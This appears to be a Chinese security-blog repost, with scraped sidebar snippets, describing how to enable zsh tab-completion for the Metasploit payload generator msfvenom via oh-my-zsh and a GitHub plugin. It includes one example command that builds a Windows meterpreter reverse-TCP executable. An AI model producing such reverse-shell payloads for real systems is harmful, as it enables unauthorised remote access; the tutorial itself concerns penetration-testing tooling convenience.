Kali 工具 之 Msfvenom 命令自动补全篇

释放双眼,带上耳机,听听看~!

内网漫游之SOCKS代理大结局

喜欢和爱,好比想吃和去买 ▲Ms08067 这篇文章是我3年前在360安全客投的第一篇文章,在网上广为流传,帮助了很多新手对于内网socks代理的学习。选用此文章作为公众号开通后的第一篇文章,也是希望自己能够不忘初心,继续多写一些对新手有帮助的文章! 0×01

本文作者:nan0Ms08067实验室红队小组成员

0X00 背景:
msfvenom大家都不陌生,在我们使用MSF进行权限维持,内网渗透的时候都会用到,支持的语言的种类很多。大家都知道我们在使用msfvenom 的时候需要手动输入很多参数,这些参数需要记忆,或记在其它地方,用的时候在查看使用哪个参数,哪条命令,非常的不方便。
比如:我要生成一个 32 位 exe 的 payload,命令为:
msfvenom

-p windows/meterpreter/reverse_tcp

LHOST=1.1.1.1 LPORT=1234 -f exe -o /home/a.exe
全靠手一个字一个字输入啊,这还不算 -a -e -i -x 等参数,而且每个参数选项也非常多,这得记多少东西。

偶然看到亮神写的一篇“解决 msfvenom 命令自动补全”文章,心想,还有这操作?

瞬间感觉走上了人生巅峰

注:亮神给的文档并不是按照一步一步写的,更像是笔记,所以有些内容不全,按照他给的操作是不成功的, 而按照官方给的操作也没有做成功。问题到底出现在哪里?下面附上我整个的操作步骤!

0X01 实验环境:
操作系统:ubuntu16.04

部署软件:metasploit5.0

0X02 安装 oh-my-zsh
命令补全功能要借助 oh-my-zsh 软件,官装方法,找个适合自己的就可以, 官网地址:https://ohmyz.sh/
因为我是 ubuntu 系统,我选择安装

sh -c “$(wget https://raw.github.com/robbyrussell/oh-my-zsh/master/tools/install.sh -O -)”

What? 报错了,原来需要依赖 zsh,使用 apt-get install zsh 安装

安装完成后,再安装 oh-my-zsh

出来此界面说明安装成功!

0X03 安装自动补全脚本
输入: git clone https://github.com/Green-m/msfvenom-zsh-completion ~/.oh-my-zsh/custom/plugins/msfvenom/

查看是否已下载_msfvenom 文件

使用 nano 命令打开 ~/.zshrc 文件 nano~/.zshrc 找到 plugins=(git) 将 msfvenom 添加到里面 plugins=(gitmsfvenom)

保存,退出 执行 source~/.zshrc 或 zsh 命令。
按照以上的操作应该就能实现了,此步骤也是官方给出的步骤,但是实际操作后,并不能补全命令

按 tab 键没有任何反应,说明失败。

分享一些CTF WriteUp

团队核心a-running-snail喜欢研究各类渗透原理,为此整理了归纳了很多实用的知识链接,方向为web安全、内网渗透、应急响应等,准备陆续分享给大家,今天就分享一些CTF WriteUp。 CTF相关: CTF社区:https://www.bugku.com/forum.php CTF在线工具网站:http:/

0X04 解决方法
我也是经过了很长时间才找到解决方法的,是我无意中看见关于 docker 命令补全方法, 其中多出了两条命令,我拿过来一试,成功了,尼玛,意不意外,惊不惊喜?

到底是哪两条命令呢 ,官方解释
fpath=(~/.zsh/completion$fpath) ($fpath 通过添加来包含您的目录~/.zshrc) autoload-Uzcompinit&&compinit-i (确保 compinit 已加载或通过添加~/.zshrc)

将这两条命令加到 ~/.zshrc 最后一行

保存退出,zsh 一下,输入 msfvenom- 按 tab 键,奇迹出现了

感受一下

是不是很爽,都不需要看文档,直接输出,很方便。

参考文献
感谢亮神,如果没有亮神的笔记,根本就不知道还有这操作。
感谢工具作者,让我们使用起来更方便。
原网址:https://github.com/Green-m/msfvenom-zsh-completion Oh-my-zsh

官网:https://ohmyz.sh/ 亮神笔记《第三十讲:解决 msfvenom 命令自动补全》

docker 官网:https://docs.docker.com/compose/completion/


来源:Ms08067安全实验室



界世的你当

作你的肩膀



 ms08067安全实验室

本文源自微信公众号:Ms08067安全实验室

《Web安全攻防》配套视频 之 Boolean注入攻击及代码分析

《Web安全攻防-渗透测试实战指南》配套视频 第十二期 本期视频内容对应图书 第4章  Web安全原理剖析 4.1 SQL注入的基础 4.1.6 Boolean注入攻击 4.1.7 Boolean注入代码分析 如果学习有疑问, 可以登录官网: https://www.ms08067.com 书籍介绍 《Web安全攻防-

人已赞赏
安全工具

获取当前系统所有用户的谷歌浏览器密码

2019-10-14 20:16:32

安全工具

内网漫游之SOCKS代理大结局

2019-10-14 20:16:39

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索